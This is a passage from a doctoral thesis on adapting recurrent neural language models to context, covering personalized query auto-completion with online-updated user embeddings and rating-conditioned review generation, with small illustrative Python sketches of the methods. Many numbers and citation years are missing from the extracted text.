one way of thinking about the difference between the concatcell and the factorcell models is to ask where in the model is that information encoded. the context embedding c has too few bits to hold much information by itself. the same is true for the concatcell’s q matrix from equation . . the information must be held inside the shared weight matrix w. this exposes a weakness of the concatcell model. if only one context is being used at a time why should the weights for all the contexts be active all the time? the factorcell model has many extra parameters stored in the zl and zr tensors. it is able to offload context specific information to these locations and only use it when it is needed. the models evaluated here were tuned to minimize perplexity, as is typical for language modeling. in analyses of performance with different hyperparameter settings, we find that perplexity is not always positively correlated with accuracy, but the criteria are more often correlated for approaches that adapt the recurrent layer. while not surprising, the results raise concerns about using perplexity as the sole evaluation metric for context-aware lan- guage models. more work is needed to understand the relative utility of these objectives for language model design, which we address in chapter . in real applications, it is possible for the meaning of the contexts to shift over time and the adapted model becomes out-of-date. to fix this, the model needs to be replenished by re-training with new data or it can be updated continuously using online learning. we address the latter of these two strategies in the next chapter. chapter personalized query auto-completion . background this chapter demonstrates the benefits of the factorcell model on the real-world task of query auto-completion (qac). qac is a feature used by search engines that provides a list of suggested queries for the user as they are typing. for instance, if the user types the prefix “mete” then the system might suggest “meters” or “meteorite” as completions. this feature can save the user time and reduce cognitive load (cai et al., ). most approaches to qac are extensions of the most popular completion (mpc) algo- rithm (bar-yossef and kraus, ). mpc suggests completions based on the most popular queries in the training data that match the specified prefix. one way to improve mpc is to consider additional signals such as temporal information (shokouhi and radinsky, ; whiting and jose, ) or information gleaned from a users’ past queries (shokouhi, ). this chapter deals with the latter of those two signals, i.e. personalization. personaliza- tion relies on the fact that query likelihoods are drastically different among different people depending on their needs and interests. recently, (park and chiba, ) suggested a significantly different approach to qac. in their work, completions are generated from a character lstm language model instead of by ranking completions retrieved from a database, as in the mpc algorithm. this approach is able to complete queries whose prefixes were not seen during training and has significant memory savings over having to store a large query database. building on this work, we consider the task of personalized qac using an lstm language model, combining the obvious advantages of personalization with the effectiveness of the the content of this chapter draws from our previously published work (jaech and ostendorf, b). language model in handling rare and previously unseen prefixes. 
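for reference, the core of mpc can be sketched as a frequency-ranked lookup over training queries that share the typed prefix. this is a minimal sketch that ignores the ranking refinements used in production systems, and the class and variable names are ours.

from collections import Counter

class MostPopularCompletion:
    """minimal most-popular-completion baseline: rank full training queries by frequency."""
    def __init__(self, training_queries):
        self.counts = Counter(training_queries)

    def complete(self, prefix, n=5):
        matches = [(q, c) for q, c in self.counts.items() if q.startswith(prefix)]
        matches.sort(key=lambda qc: -qc[1])
        return [q for q, _ in matches[:n]]

mpc = MostPopularCompletion(["meters", "meteorite", "meters", "metallica"])
print(mpc.complete("mete"))   # -> ['meters', 'meteorite']
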
the model must learn how to extract information from a user’s past queries and use it to adapt the generative model for that person’s future queries. user information is held in the form of a low- dimensional embedding that represents the person’s interests and latent demographic factors. the experiments demonstrate that by allowing a greater fraction of the parameters to change in response to the user embeddings, the factorcell has an advantage over the traditional approach to rnn language model adaptation that increases as more examples from the user are seen. this task is different from the experiments described in chapter because new contexts (users) can emerge after the model has been trained and deployed. we introduce a mechanism to do online learning of the user embeddings, something that has not been addressed in prior work on language model adaptation. table . provides an anecdotal example from the trained factorcell model to demonstrate the intended behavior. the table shows the top five completions for the prefix “ba” in a cold start scenario and again after the user has completed five sports related queries. in the warm start scenario, the “baby names” and “babiesrus” completions no longer appear in the top five and have been replaced with “basketball” and “baseball”. in the online learning scenario, the factorcell model makes efficient use of the user query history to quickly improve the quality of the auto-completions. while the standard implementation of mpc can not handle unseen prefixes, there are variants which do have that ability. park and chiba ( ) find that the neural lm out- performs mpc even when mpc has been augmented with the approach from mitra and craswell ( ) for handling rare prefixes. there has also been work on personalizing mpc (shokouhi, ; cai et al., ). we did not compare against these specific models because our goal was to show how personalization can improve the already-proven generative neural model approach. rnn’s have also previously been used for the related task of next query suggestion (sordoni et al., ). wang et al. ( ) show how spelling correction can be integrated into an rnn language model query auto-completion system and how the completions can be generated in real cold start warm start bank of america bank of america barnes and noble basketball babiesrus baseball baby names barnes and noble bank one baltimore table . : top five completions for the prefix ba for a cold start model with no previous queries from that user and a warm model that has seen the queries espn, sports news, nascar, yankees, and nba. time using a gpu. our method of updating the model during evaluation resembles work on dynamic evaluation for language modeling (krause et al., ), but differs in that only the user embeddings (latent demographic factors) are updated. if the rest of the model is allowed to update then either some user embedding can become stale or there will be a large memory cost to hold different versions of the model for each person. one possibility would be to allow the full model to update and also implement a policy to invalidate stale user embeddings but that is beyond the scope of this work. . model adaptation depends on learning an embedding for each user, which we discuss in section . . , and then using that embedding to adjust the weights of the recurrent layer, discussed in section . . . . . learning user embeddings during training, we learn an embedding for each of the users. 
we think of these embeddings as holding latent demographic factors for each user. users who have less than queries in the training data (around half the users but less than % of the queries) are grouped together as a single entity, user , leaving k users. the user embeddings matrix uk×m, where m is the user embedding size, is learned via back-propagation as part of the end-to-end model. the embedding for an individual user is the ith row of u and is denoted by ui. the user embedding plays the same role as the context embedding from section . . that elsewhere is denoted by c. it is important to be able to apply the model to users that are not seen during training. this is done by online updating of the user embeddings during evaluation. when a new person, userk+ is seen, a new row is added to u and initialized to u . each person’s user embedding is updated via back-propagation every time they select a query. when doing online updating of the user embeddings, the rest of the model parameters (everything except u) are frozen. the learning rate for the online updating should be different than the one used for training the rest of the model. when training the full model, the goal is to converge to a global minimum. during online updating the user embeddings do not converge to a fixed point but continue to track the query history. the optimal learning rate must be found using validation data. . . recurrent layer adaptation we consider three model architectures which differ only in the method for adapting the recurrent layer. first is the unadapted lm, analogous to the model from park and chiba ( ), which does no personalization. the second architecture is the concatcell, which concatenates a user embedding to the character embedding at every step of the input to the recurrent layer. for the third model, we test the factorcell’s ability to let the user embedding transform the weights of the recurrent layer. unlike the previous chapter, we do not incorporate the concatcell adaptation of the recurrent layer bias when using the factorcell model. we found that this was unnecessary in preliminary experiments. when operating at the character-level, the unigram distribution is not particularly in- formative of the differences between users. this is unlike the word-level models, where the unigram distribution can carry topic information. for this reason, we do not employ any of the techniques from chapter for adapting the softmax bias vector. . data the experiments make use of the aol query data collected over three months in (pass et al., ). the first six of the ten files were used for training. this contains approximately million queries from , users for an average of queries per user (median ). a set of , queries from those same users ( % of the data) was reserved for tuning and validation. from the remaining files, one million queries from , users are used to test the models on a disjoint set of users. the chronological ordering of the queries is ignored during training but respected during testing. our results are not directly comparable to park and chiba ( ) or mitra and craswell ( ) due to differences in the partitioning of the data and the method for selecting random prefixes. prior work partitions the data by time instead of by user. splitting by users is necessary in order to properly test personalization over longer time ranges. . experiments . . experiment details the vocabulary consists of characters including special start and stop tokens. models were trained for six epochs. 
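the online user-embedding update described in this section can be sketched as follows: everything except the user embedding matrix u is frozen, and after each selected query the active user's row is nudged by the gradient of that query's log-likelihood. the gradient function, the learning rate, and all names are illustrative stand-ins rather than pieces of our tensorflow implementation.

import numpy as np

class OnlineUserEmbeddings:
    """holds the user embedding matrix u; row 0 is the pooled rare-user embedding u_0."""
    def __init__(self, u_matrix, lr=0.1):
        self.U = u_matrix          # shape: (num_users, m)
        self.lr = lr               # tuned separately from the training learning rate

    def add_new_user(self):
        """a previously unseen user starts from a copy of u_0."""
        self.U = np.vstack([self.U, self.U[0:1].copy()])
        return self.U.shape[0] - 1

    def update(self, user_id, query, grad_wrt_embedding):
        """one ascent step on the user embedding only; the rest of the model stays frozen."""
        self.U[user_id] += self.lr * grad_wrt_embedding(query, self.U[user_id])

# toy usage with a dummy gradient function (illustration only)
emb = OnlineUserEmbeddings(np.zeros((1, 4)))
uid = emb.add_new_user()
emb.update(uid, "espn", lambda q, u: np.ones_like(u) * 0.01)
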
the adam optimizer is used during training with a learning rate of − (kingma and ba, ). the language model is a single-layer character-level lstm with coupled input and forget gates and layer normalization (melis et al., ; ba et al., ). we do experiments on two model configurations: small and large. the small models use an lstm hidden state size of and dimensional user embeddings. the large models use a hidden state size of and dimensional user embeddings. both sizes use dimensional character embeddings. for the small sized models, we experimented with different values of the factorcell rank hyperparameter between and dimensions finding that bigger rank is better. the large sized models used a fixed value of for the rank hyperparemeter. during training only and due to limited computational resources, queries are truncated to a length of characters. the model is implemented using tensorflow. when updating the user embeddings during evaluation, we found that it is easier to use an optimizer without momentum. we use adadelta (zeiler, ) and tune the online learning rate to give the best perplexity on a held-out set of , queries, having previously verified (see figure . ) that perplexity is a good indicator of performance on the qac task. the learning rate is the only parameter that needs to be tuned for online learning. prefixes are selected uniformly at random with the constraint that they contain at least two characters in the prefix and that there is at least one character in the completion. to generate completions using beam search, we use a beam width of and a branching factor of . results are reported using mean reciprocal rank (mrr), the standard method of evaluating qac systems. it is the mean of the reciprocal rank of the true completion in the top ten proposed completions. the reciprocal rank is zero if the true completion is not in the top ten. neural models are compared against an mpc baseline. following (park and chiba, ), we remove queries seen less than three times from the mpc training data to avoid excessive memory usage. . . results the training objective, minimizing perplexity, differs from the evaluation metric, maximizing the mean reciprocal rank of the query completion. fortunately, the mismatch between met- rics is not large. as shown in figure . , perplexity correlates with mrr on the development data. table . compares the performance of the different models against the mpc baseline on a test set of one million queries from a user population that is disjoint with the training set. code is available at http://github.com/ajaech/query completion. figure . : perplexity versus mrr on the development data for different classes of models. results are presented separately for prefixes that are seen or unseen in the training data. if the prefix was not seen in the training data then the query is guaranteed to be relatively rare. consistent with prior work, the neural models do better than the mpc baseline. the personalized models are better than the unadapted one, and the factorcell model is the best overall in both the big and small sized experiments. figure . shows the relative improvement in mrr over an unpersonalized model versus the number of queries seen per user. both the factorcell and the concatcell show continued improvement as more queries from each user are seen, and the factorcell outperforms the concatcell by an increasing margin over time. in the long run, we expect that the system will have seen many queries from most users. therefore, the right side of figure . 
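the evaluation metric follows directly from its definition; the helper below assumes each test example supplies the true completion and the system's ranked top-ten list, and the names are illustrative.

def mean_reciprocal_rank(examples):
    """examples: iterable of (true_completion, ranked_top_ten) pairs."""
    total = 0.0
    count = 0
    for truth, ranked in examples:
        rr = 0.0
        for rank, candidate in enumerate(ranked[:10], start=1):
            if candidate == truth:
                rr = 1.0 / rank
                break
        total += rr
        count += 1
    return total / max(count, 1)

print(mean_reciprocal_rank([("meters", ["meteorite", "meters"]),
                            ("nba", ["nba scores"])]))   # -> (0.5 + 0.0) / 2
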
, where the factorcell is up to % better than the concatcell, is more representative of the relative performance of the two systems. since the data was collected over a limited time frame and half of all users have fifteen or fewer queries, the results in table . do not reflect the full benefit of personalization. figure . shows the mrr for different prefix and query lengths. we find that longer size model seen unseen all mpc . . . unadapted . . . (s) concatcell . . . factorcell . . . unadapted . . . (b) concatcell . . . factorcell . . . table . : mrr reported for seen and unseen prefixes for small (s) and big (b) models. figure . : relative improvement in mrr over the unpersonalized model versus queries seen using the large size models. plot uses a moving average of width to reduce noise. figure . : mrr by prefix and query lengths for the large factorcell and unadapted models with the first queries per user excluded. prefixes help the model make longer completions and (as expected) shorter completions have higher mrr. comparing the personalized model against the unpersonalized baseline, we see that the biggest gains are for short queries and prefixes of length one or two. we found that one reason why the factorcell outperforms the concatcell is that it is able to pick up sooner on the repetitive search behaviors that some users have. this commonly happens for navigational queries like when someone searches for the name of their favorite website once or more per day. at the extreme tail there are users who search for nothing but free online poker. both models do well on these highly predictable users but the factorcell is generally a bit quicker. we conducted an analysis to better understand what information is represented in the user embeddings and what makes the factorcell different from the concatcell. from a cold start user embedding we ran two queries and allowed the model to update the user embedding. then, we ranked the most frequent , queries based on the ratio of their likelihood from before and after updating the user embeddings. tables . , . , and . show the queries with the highest relative likelihood of the adapted vs. unadapted models after two related search queries: “high school softball” and factorcell concatcell high school musical horoscope chris brown high school musical funnyjunk.com homes for sale funbrain.com modular homes chat room hair styles table . : the five queries that have the greatest adapted vs. unadapted likelihood ratio after searching for “high school softball” and “math homework help”. “math homework help” for table . , “prada handbags” and “versace eyewear” for table . , and “discount flights” and “yellowstone vacation packages” for table . . in all cases, the factorcell model examples are more semantically coherent than the concatcell examples. in the first case, the factorcell model identifies queries that a high school student might make, including entertainment sources and a celebrity entertainer popular with that demographic. in the second case, the factorcell model chooses retailers that carry woman’s apparel and those that sell home goods. while these companies’ brands are not as luxurious as prada or versace, most of the top luxury brand names do not appear in the top , queries and our model may not be capable of being that specific. there is no obvious semantic connection between the highest likelihood ratio phrases for the concatcell; it seems to be focusing more on orthography than semantics (e.g. “home” in the first example). 
in the last case, the factorcell suggests a map and four different airlines and the concatcell suggests a flight tracker (unlikely to be useful to someone looking to buy a ticket), a bank, and three reformulations of the original “discount flights” query. not shown are the queries which experienced the greatest decrease in likelihood. for the “high school” case, these included searches for travel agencies and airline tickets—websites not targeted towards the high school age demographic. factorcell concatcell neiman marcus craigslist nyc pottery barn myspace layouts jc penney verizon wireless verizon wireless jensen ackles bed bath and beyond webster dictionary table . : the five queries that have the greatest adapted vs. unadapted likelihood ratio after searching for “prada handbags” and “versace eyewear”. factorcell concatcell yahoo maps flight tracker delta airlines suntrust bank alaska airlines cheap tickets us airways airline tickets southwest airlines cheap flights table . : the five queries that have the greatest adapted vs. unadapted likelihood ratio after searching for “discount flights” and “yellowstone vacation packages”. . summary our experiments show that the lstm model can be improved using personalization. the method of adapting the recurrent layer clearly matters and we obtained an advantage by using the factorcell model. the reason the factorcell does better is in part attributable to having two to three times as many parameters in the recurrent layer as either the concatcell or the unadapted models. by design, the adapted weight matrix w′ only needs to be computed at most once per query and is reused many thousands of times during beam search. as a result, for a given number of floating point operations, the factorcell model outperforms the concatcell model for lstm adaptation. the cost for updating the user embeddings is similar to the cost of the forward pass and depends on the size of the user embedding, hidden state size, factorcell rank, and query length. in addition, we note that updates can be less frequent to reduce costs and in most cases there will be time between queries for updates. we showed that language model personalization can be effective even on users who are not seen during training. the benefits of personalization are immediate and increase over time as the system continues to leverage the incoming data to build better user representations. the approach can easily be extended to include time as an additional conditioning factor. we leave the question of whether the results can be improved by combining the language model with mpc for future work. chapter context-specific text generation context-specific generation is when a generative model is designed such that stylistic, topical, or other properties of the text can be specified when sampling from the model. one of the weaknesses of rnn language models is that it is difficult to control the content or the style of the text that they produce. it is natural to expect that if a language model is conditioned on a particular context then it will produce text that is appropriate for that context. conditioning, or adapting to, context is one way of controlling generation (ficler and goldberg, ) and that is the application that we explore in this chapter. we conduct experiments and analysis using the yelp restaurant review and the tripad- visor hotel review datasets from section . . these experiments reuse the models that were trained for the experiments in section . 
, including models adapted using the softmaxbias, concatcell, and factorcell strategies. the focus of the experiments in this chapter is to highlight differences in context-specificity between these models by generating reviews from the models and checking if the text is appropriate for the given context. the generated reviews are judged using a classifier that has been trained for that purpose. the automatic judgments are supplemented by human ratings to confirm the reliability of the classifier. there are ways of producing context-specific text without generating it from a language model such as by retrieving examples with matching context from the training data or combining retrieval with a neural edit model (li et al., ). our context-specificity metric will highly reward these types of models or any model that produces easy to classify content even if that content is unnatural or an outlier. retrieval-based methods may work well in certain applications but others require the use of a language model. this chapter focuses specifically on language models. we emphasize that a context-specificity metric by itself is not enough to judge the quality of a language model. low perplexity is important for good generation. however, a language model that has low perplexity and is also capable of context-specific generation will have more applications than a non-context-specific model. . text generation to generate text from an rnn, we use the model to predict the probability of observing each possible word as the next token in the sequence starting by inputting a special start of sentence token for w . the next token probabilities are given by the yt vector from equation . . one option is to take the next word as the highest probability entry in yt, known as greedy decoding. making greedy decisions can lead us down a path that is globally suboptimal and may not result in finding the sequence with the highest overall likelihood. instead, using an algorithm known as beam search, several possibilities are considered for the next word and are placed in a queue that holds the most likely word sequences found so far. beam search can find many high probability sentences but oftentimes it suffers from a lack of diversity. the highest probability sequences will all have considerable overlap with each other. this is not desirable in text generation because we generally want multiple texts with non-trivial differences to pick from and also because excessive repetition is tedious for human readers. a simple tweak that leads to more diverse generation is to stochastically expand the beam by sampling l items from the multinomial distribution given by yt instead of deterministically picking the top l words. when we use this technique we refer to it as a stochastic beam search. we can trade-off between the stochastic and deterministic versions of beam search by using a temperature parameter t in the softmax function as follows: softmax(xi) = exp(−xi t )∑ j exp(− xj t ) . ( . ) lowering the temperature t increases the concentration of probability mass at the head of the distribution. if the temperature is too high then the generated text can be nonsensical. if it is too low then the generation lacks diversity. in the limit when t goes to zero, it becomes equivalent to greedy decoding. so, finding the right balance is important. stochastic beam search deals with repetition between sampled texts. rnn language models also tend to use the same phrase repetitively within a single sentence or document, e.g. 
a restaurant review that says “the food was good and the service was great and the food was good and...”. to deal with this we use a heuristic that does not consider any beam expansion that would create a repeated trigram. several sophisticated techniques and heuristics exist (such as adding random penalties to subsets of the vocabulary (juuti et al., ) or having special models trained to enforce relevance and avoid contradiction and repetition (holtzman et al., )) but banning repeated trigrams is sufficient for our purpose of making a comparison between adaptation methods. . illustrative examples to start, we provide anecdotal examples in tables . , . , and . illustrating the behavior of each adaptation technique when generating yelp restaurant reviews given a star rating. in each case, a sentence template was selected and beam search decoding was used to find the highest probability word sequence that fits the gap in the template. this was repeated once for each of the possible star ratings from one to five. the sentence completions from the factorcell model are better matched to the specified star ratings. table . is probably the best example for the intensity of the selected adjectives to match with the corresponding star ratings. on the other hand, when using the concatcell model there is not a clear distinction between ratings. the concatcell picks the same completion for multiple star ratings (“loved it” in table . and “great!” in table . ) and in table . it gets the wrong polarity for the star rating completion. context factorcell concatcell softmaxbias stars it was amazing loved it ! it was amazing ! stars loved it ! loved it ! it was delicious stars it was great ! loved it ! had a blast stars it was horrible ! had a blast was disappointed star it was horrible ! it was horrible ! was disappointed table . : top completions for the sentence “my boyfriend and i ate here and !” after conditioning on each star rating. context factorcell concatcell softmaxbias stars amazing ! great ! delicious stars great ! great ! delicious stars good ! great ! delicious stars just meh mediocre mediocre star awful mediocre mediocre table . : top completions for the sentence “this was my first time coming here and the food was ” after conditioning on each star rating. context factorcell concatcell softmaxbias stars be back never go here never go here stars be back go never go here stars go back go never go here stars never go here never never go here star never go here never never go table . : top completions for the sentence “i will again” after conditioning on each star rating. . experiments and analysis . . yelp restaurant reviews to quantify the differences between models, we sampled , yelp reviews from different models. the models differ in their adaptation method but also in their lstm size and other hyperparameters including random word embedding sizes, epochs, context embedding size and factorcell rank. having variation in the hyperparameter settings allows us to analyze the relationship between perplexity and context-specificity, among other things. the generation used stochastic beam search with a temperature of . , a beam width of and a total beam size of . only the first words of the review were generated and the beam was constrained to not allow repeated trigrams as a heuristic to avoid excessive repetition. a discriminative classifier was trained to predict star rating on the same data that was used to train the language models. 
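before turning to the automatic judgments, the stochastic beam expansion with temperature and the repeated-trigram filter described above can be summarized in a short sketch. the probability model is a stand-in, and the parameter values and names are illustrative assumptions only.

import numpy as np

def temperature_softmax(logits, t=1.0):
    """temperature-scaled softmax; lower t concentrates mass at the head of the distribution."""
    z = np.asarray(logits, dtype=float) / t
    z -= z.max()                      # for numerical stability
    p = np.exp(z)
    return p / p.sum()

def creates_repeated_trigram(tokens, next_token):
    """true if appending next_token would repeat a trigram already in the hypothesis."""
    seq = tokens + [next_token]
    if len(seq) < 3:
        return False
    new = tuple(seq[-3:])
    seen = {tuple(seq[i:i + 3]) for i in range(len(seq) - 3)}
    return new in seen

def stochastic_expand(hypothesis, logits, vocab, l=3, t=0.8, rng=None):
    """sample l candidate next words (instead of taking the top l) and drop trigram repeats."""
    rng = rng or np.random.default_rng()
    probs = temperature_softmax(logits, t)
    picks = rng.choice(len(vocab), size=l, replace=False, p=probs)
    return [hypothesis + [vocab[i]] for i in picks
            if not creates_repeated_trigram(hypothesis, vocab[i])]

vocab = ["the", "food", "was", "good", "and"]
print(stochastic_expand(["the", "food", "was"], [0.1, 0.5, 0.2, 2.0, 1.0], vocab,
                        rng=np.random.default_rng(0)))
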
we used the fasttext model because it is near state-of-the-art and it can be efficiently trained and evaluated (grave et al., b). this classifier was used to judge the generated reviews to see if they conform to their given ratings. this strategy was used by hu et al. ( ) to evaluate "controllable" text generation. it is also similar to the text generation evaluation used by ficler and goldberg ( ) except that for some attributes they used hand-crafted decision rules instead of a statistical classifier and for other attributes deemed too difficult to classify they used human evaluation. there are multiple ways to report the judgment of the discriminative classifier. the most straightforward is accuracy, which is the percentage of times where the most probable rating according to the classifier matched the context given to the language model. in addition to this metric, we report results in terms of mean absolute deviation (the average absolute difference between the desired rating and the predicted rating). achieving perfect accuracy is not realistic for this task because there is some natural ambiguity between adjacent star ratings. the fasttext classifier has an accuracy of % and a mean absolute deviation (mad) of . stars on the yelp test data.

figure . plots the context classification metric from chapter (accuracy of classifying actual reviews using the language model as a classifier) against the generation context-specificity metric (accuracy of classifying automatically generated text with a classifier trained on actual reviews). each point in this plot is an independent model trained with random hyperparameters. the context classification accuracy is highly predictive of the generation context-specificity. thus, it is not surprising that the factorcell models are the most controllable followed by the concatcell models and then the softmaxbias models.

figure . : context classification accuracy versus generation context-specificity for each type of adaptation on the yelp data.

as shown in figure . , there is a strong correlation between factorcell rank and context-specificity (r = . ) but no relationship (r = . ) with perplexity. having low perplexity is obviously important for high-quality generation but low perplexity by itself is not an indicator that the generated text will match the specified conditions. we included some additional models here that were not used in the experiments in chapter and were trained with bigger (up to double the size) lstm hidden states. this is to address the question of whether the gap between models is reduced simply by training a bigger model. the bigger lstm states do help with perplexity, but we find little to no impact on context-specificity.

figure . : plot of factorcell rank and perplexity against generation context-specificity accuracy for factorcell models on the yelp restaurant data.

table . lists the perplexity, automatically assessed generation accuracy, and the mean absolute deviation for each of the four classes of models.

model | acc | mad | ppl
unadapted | . | . | .
softmaxbias | . | . | .
concatcell | . | . | .
factorcell | . | . | .

table . : automatically judged generation accuracy, mean absolute deviation (mad), and perplexity for the three methods of adaptation compared to the unadapted baseline using the models learned from the yelp data.

using human raters on a subset of the generated reviews, we confirm that the automatic judgments are correlated with human judgments with r = . . nine raters judged a set of reviews for this analysis.
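before turning to the human evaluation in more detail, note that the two automatic judgments above reduce to a few lines of code once the classifier's predictions are available. the helper below is a hypothetical illustration and is not tied to any particular classifier implementation.

```python
def generation_context_specificity(intended_ratings, predicted_ratings):
    """score generated reviews against the ratings they were conditioned on.

    intended_ratings : star ratings given to the language model as context
    predicted_ratings: ratings assigned to the generated text by the classifier
    """
    assert len(intended_ratings) == len(predicted_ratings)
    n = len(intended_ratings)
    # accuracy: fraction of generations whose predicted rating matches the context
    accuracy = sum(y == p for y, p in zip(intended_ratings, predicted_ratings)) / n
    # mean absolute deviation: average absolute difference between the two ratings
    mad = sum(abs(y - p) for y, p in zip(intended_ratings, predicted_ratings)) / n
    return accuracy, mad
```

for example, generation_context_specificity([5, 4, 1], [5, 3, 1]) returns an accuracy of about 0.67 and a mad of about 0.33.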
the raters were able to guess the intended star rating % of the time for the factorcell compared to only % of the time for the concatcell.

. . tripadvisor hotel reviews

we conduct a similar analysis using the tripadvisor hotel review data and models from chapter and check that the hotel class property matches with the generated text. hotel class is a rating that reflects the quality of the service and amenities offered by the hotel and is measured in half integer increments. only the identity of the hotels and the star rating (sentiment) of each review is provided during training and any information the model learns about class must be derived from the text of the review. hotel reviews are sampled using a temperature of . , a beam width of and a beam size of . only the first to words of each review were generated and , samples were collected from independent models. when generating the hotel reviews we pick a random hotel identifier for each one and fix the sentiment at five stars. like before, these models use a range of hyperparameters in order to study the relationship between the capacity of the model and its performance.

the fasttext classifier predicts hotel class with an accuracy of % and a mean absolute deviation of . on the tripadvisor test data. using this classifier to judge the generated reviews, we find that the factorcell is the most context-specific for the hotel class. the complete metrics are in table . .

model | acc | mad | ppl
unadapted | . | . | .
softmaxbias | . | . | .
concatcell | . | . | .
factorcell | . | . | .

table . : automatically judged generation accuracy, mean absolute deviation (mad), and perplexity for the three methods of adaptation compared to the unadapted baseline using the models learned from the tripadvisor data.

besides their lack of context-specificity, the unadapted models also suffer from a lack of diversity. the unadapted models tend to default to generating reviews that match the largest region in the data, new york city. up to % of the generated reviews from the unadapted models mention the empire state building (compared to % to % for the adapted models) even though only % of the training data are from hotels in new york city and only . % of that % even mention the empire state building. conditioning on context information makes it easier to guide the generation away from the mode and towards more diverse samples.

as shown in figure . , increasing the factorcell rank helps with context-specificity of the hotel class just as it did with controlling the star rating of the yelp reviews in figure . . however, instead of a lack of correlation with perplexity, we see that models with better perplexity also do better at context-specificity. as with the restaurant reviews, the accuracy of the models when used as generative text classifiers is predictive of their performance for context-specific generation. we show this relationship in figure . .

we used the tripadvisor models to test if the difference in context-specificity between the models was due to the quality of the representation learned in the hotel embeddings. we trained a gradient boosted decision tree to predict the hotel class using the hotel embeddings as features. as we saw in figure . , the hotel embeddings naturally group together by class even though the hotel class labels were not available during training. using five-fold cross validation on the , embeddings, we found little to no difference between models, with both the concatcell and factorcell correctly predicting the class in . % of cases versus .
% for the softmaxbias model. figure . : context-specificity of hotel class versus factorcell rank and perplexity in gener- ated reviews using the models learned on the tripadvisor data. figure . : context classification accuracy versus generation context-specificity for each type of adaptation on the tripadvisor data. . summary recall that the concatcell model only adapts the recurrent layer bias vector. assuming -dimensional word embeddings and a dimensional lstm, only , or . % of the recurrent layer parameters change depending on the context. in contrast, a factorcell model with the same embedding size and recurrent layer dimension and a rank of has . % of its recurrent layer parameters changing depending on context. that’s more than times as many as the concatcell. when so few of the parameters are adapted, the result is a blurring of the distinctions between different contexts. we saw this qualitatively in the restaurant review sentence completions and quantitatively when measuring the context-specificity of the restaurant review star rating and the hotel review class. in chapter , we used a context classification metric whereby the language model was used as a generative text classifier on held-out data in order to test its ability to understand the relationship between context and language. the experiments in this chapter show that the context classification metric is a useful predictor of text generation context-specificity. this means that we can assess the relative context-specificity of models independently of the generation hyperparameters (beam size, temperature, etc.) and without the need to construct a classifier or use human ratings to do judgments. this is useful because there are cases where a high quality classifier may not be readily available. for human ratings, not only are they expensive and time-consuming to collect, but there are also certain contexts where humans may be poor judges without special experience or training. our method of evaluating context-specificity of the generated text has some limitations. because the fasttext classifier is trained on the same data as the language model, it has the potential to reward the language model for memorizing portions of the training data instead of generating novel sentences. additionally, as we mentioned in the introduction to this chapter, context-specificity alone is not enough to evaluate a language model because it does not measure the ability of the model to generate well-formed text that is free from excessive repetitions and self-contradictions. we know from chapter that the factorcell model does have a perplexity that is comparable or better than baseline methods. however, a more comprehensive assessment is needed to take into account all of the desired attributes. chapter conclusions and future directions the fact that language changes so dramatically from one situation to the next is both a challenge and an opportunity. it is a challenge because changes in context that may seem trivial to us as humans are enough to break a language model. it is an opportunity because dramatic changes means that large benefits can be accrued through adaptation. as an illus- tration, the amazon alexa prize encouraged people to speak to their device using an open-ended conversational style. this was a change from the task-oriented style that peo- ple normally used to speak with their home assistants. initially, a generic language model was used for the conversational interactions. 
when a language model targeting conversa- tional speech was introduced the recognition word error rate dropped by one third (ram et al., ). adjusting the language model was crucial to enabling people to have long conversations with alexa. adaptation is vital to the success of language modeling in real applications and is the reason why this work can have high impact. in this chapter we summarize the contributions of the thesis and suggest possible directions for future work. . summary of contributions our main contribution is the introduction of the factorcell model, a new way of thinking about how to adapt the recurrent layer. the factorcell model moves beyond the paradigm set by mikolov and zweig ( ) and used many times since then. the benefits of the factorcell model include: • a re-conception of the mechanism for recurrent layer adaptation (using context to transform the model rather than as an additional input); • permitting context to affect a greater change in the model parameters (and therefore its predictions) than what is possible using prior methods; • including a rank hyperparameter that smoothly trades off between the case where most information is shared between contexts and the opposite situation where the contexts are mostly modeled independently; • maintaining the property of the concatcell approach that the adapted weights can be precomputed and cached resulting in negligible computational overhead compared to an unadapted baseline; and • off-loading of context specific information from the main recurrent weight matrix to special adaptation tensors, which helps prevent the blurring of the boundary between related contexts. we presented experimental results on nine distinct datasets. three of them used character- level vocabularies and the other six operated at the word level. one dataset comprised tran- scripts of spoken language; some involved informal written language; and some were more formal. the biggest dataset had over million words of text for training and the smallest was just million characters. in every situation where it was tested, the factorcell model gave the best perplexity. however the benefits are greater for some contexts. the diversity of data helped to increase the robustness of our conclusions and led us to make some guide- lines about when different aspects of adaptation become more or less important. specifically, adapting the softmax bias is most effective for topic-based contexts and potentially less ef- fective when the recurrent layer dimensionality is large. also, the contexts that are most amenable to adaptation are specific and are not easily predicted from a short window of text. an idea that we encountered more than once is that there are differences between models that are not captured by perplexity. in chapters and , we saw that a more flexible adap- tation of the recurrent layer helped the models better distinguish contexts in classification experiments and chapter showed how models that are better at distinguishing contexts can be used for context-specific generation. there were two places where we saw clear qualitative differences between the factorcell and the concatcell. in chapter , the factorcell discovered semantic associations between search queries whereas the concatcell failed to find such associations and sometimes seemed to focus more on orthography. in chapter , the concatcell blurred the boundary between star rating levels (associated with sentiment) and the factorcell was able to make cleaner distinctions. 
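as a rough sketch of the recurrent-layer adaptation mechanism summarized in the contribution list above, the snippet below shows how a context embedding can generate a low-rank additive correction to a shared recurrent weight matrix, so that the adapted weights can be precomputed and cached per context. the shapes, names, and the omission of gate-specific details are our own simplifications, not the exact factorcell implementation.

```python
import numpy as np

def factorcell_adapted_weights(W, Z_left, Z_right, c):
    """return a context-adapted recurrent weight matrix.

    W       : (input_dim, hidden_dim) base recurrent weights shared by all contexts
    Z_left  : (context_dim, input_dim * rank) tensor generating the left factor
    Z_right : (context_dim, rank * hidden_dim) tensor generating the right factor
    c       : (context_dim,) context embedding
    """
    input_dim, hidden_dim = W.shape
    rank = Z_left.shape[1] // input_dim
    # the context embedding produces the two low-rank factors
    left = (c @ Z_left).reshape(input_dim, rank)
    right = (c @ Z_right).reshape(rank, hidden_dim)
    # low-rank, context-dependent correction added to the shared weights;
    # for a fixed context this sum can be computed once and cached
    return W + left @ right
```

the rank of the correction bounds how far the adapted weights can move away from the shared matrix, which is the smooth trade-off between shared and independent modeling of contexts described above.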
